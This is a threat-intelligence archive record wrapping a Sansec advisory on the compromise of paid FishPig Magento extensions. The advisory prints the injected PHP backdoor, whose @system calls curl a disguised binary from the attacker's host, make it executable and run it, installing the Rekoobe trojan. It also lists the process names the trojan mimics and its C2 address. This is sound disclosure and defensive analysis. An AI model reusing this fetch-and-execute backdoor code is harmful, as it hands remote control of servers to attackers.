{
	"id": "e61ad7aa-5482-40d7-b2d7-582debda5c65",
	"created_at": "2026-04-06T00:17:53.950126Z",
	"updated_at": "2026-04-10T03:24:18.257895Z",
	"deleted_at": null,
	"sha1_hash": "ac2bda66d2e36b4f56151a30cd3ff612979e7bfb",
	"title": "Magento vendor Fishpig hacked, backdoors added",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 58488,
	"plain_text": "Magento vendor Fishpig hacked, backdoors added\r\nBy Sansec Forensics Team\r\nArchived: 2026-04-05 13:53:01 UTC\r\nUpdate 2022-09-13: FishPig has confirmed the incident and published a status page. It recommends that customers upgrade and/or reinstall all FishPig modules.\r\nSansec discovered malware in the Fishpig Magento Security Suite and several other Fishpig extensions for Magento 2. It is likely that all paid Fishpig extensions have been compromised. Free extensions that are hosted on Github seem not to be affected.\r\nThe injected malware will install another piece of malware (\"Rekoobe\") which hides as a background process on the server.\r\nThe Fishpig distribution server was compromised on or before August 19th. Any Magento store that installed or updated paid Fishpig software since then is now likely running the Rekoobe malware.\r\nFishpig software has over 200,000 downloads. It is not known how many stores use the paid extensions.\r\nNext steps for merchants\r\nFishPig has stated that their repository is fully cleaned. Magento merchants are recommended to:\r\n1. Re-install all FishPig extensions per FishPig instructions\r\n2. Run a server-side malware scanner to detect installed malware & unauthorized activity. Use coupon FISHPIG to get our scanner for one month for free.\r\n3. Restart the server to terminate any unauthorized background processes\r\nAttack details: lic.bin is Rekoobe\r\nAttackers have added code to License.php, which is normally used to validate a Fishpig license. When a Magento staff user visits the Fishpig control panel in the Magento backend, the malware downloads a Linux binary from license.fishpig.co.uk. The name lic.bin may make it look like a license asset, but it is actually the Rekoobe remote access trojan.\r\n$tmp = '/tmp/.varnish7684';\r\nif (file_exists($tmp)) {\r\nhttps://sansec.io/research/rekoobe-fishpig-magento\r\nPage 1 of 3\r\n    $fp = fopen($tmp, 'w');\r\n    if (!flock($fp, LOCK_EX | LOCK_NB)) {\r\n        return $this->adminDomain;\r\n    } else {\r\n        fclose($fp);\r\n        @system(\"cd ~/;curl https://license.fishpig.co.uk/image/dev/lic.png -o lic.bin;chmod 777 lic.bin;./lic.b\r\n    }\r\n} else {\r\n    @system(\"cd ~/;curl https://license.fishpig.co.uk/image/dev/lic.png -o lic.bin;chmod 777 lic.bin;./lic.bin '\r\n}\r\nRekoobe uses a configuration file called /tmp/.varnish7684. After launching, it removes all malware files and remains in memory. It hides as a system process and mimics one of the following system services:\r\n/usr/sbin/cron -f\r\n/sbin/udevd -d\r\ncrond\r\nauditd\r\n/usr/sbin/rsyslogd\r\n/usr/sbin/atd\r\n/usr/sbin/acpid\r\ndbus-daemon --system\r\n/sbin/init\r\n/usr/sbin/chronyd\r\n/usr/libexec/postfix/master\r\n/usr/lib/packagekit/packagekitd\r\nMeanwhile, it waits for commands from the C2 server located at 46.183.217.223 (Latvia).\r\nSansec has not detected follow-up abuse via the C2 server yet. We expect that access to the affected stores may be sold in bulk on hacking forums.\r\nAcknowledgements\r\nSansec eComscan has been updated to detect the latest Rekoobe malware varieties.\r\nThanks to our partners Jetrails & Hypernode for their invaluable help in analyzing this attack!\r\nSource: https://sansec.io/research/rekoobe-fishpig-magento",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://sansec.io/research/rekoobe-fishpig-magento"
	],
	"report_names": [
		"rekoobe-fishpig-magento"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434673,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ac2bda66d2e36b4f56151a30cd3ff612979e7bfb.pdf",
		"text": "https://archive.orkl.eu/ac2bda66d2e36b4f56151a30cd3ff612979e7bfb.txt",
		"img": "https://archive.orkl.eu/ac2bda66d2e36b4f56151a30cd3ff612979e7bfb.jpg"
	}
}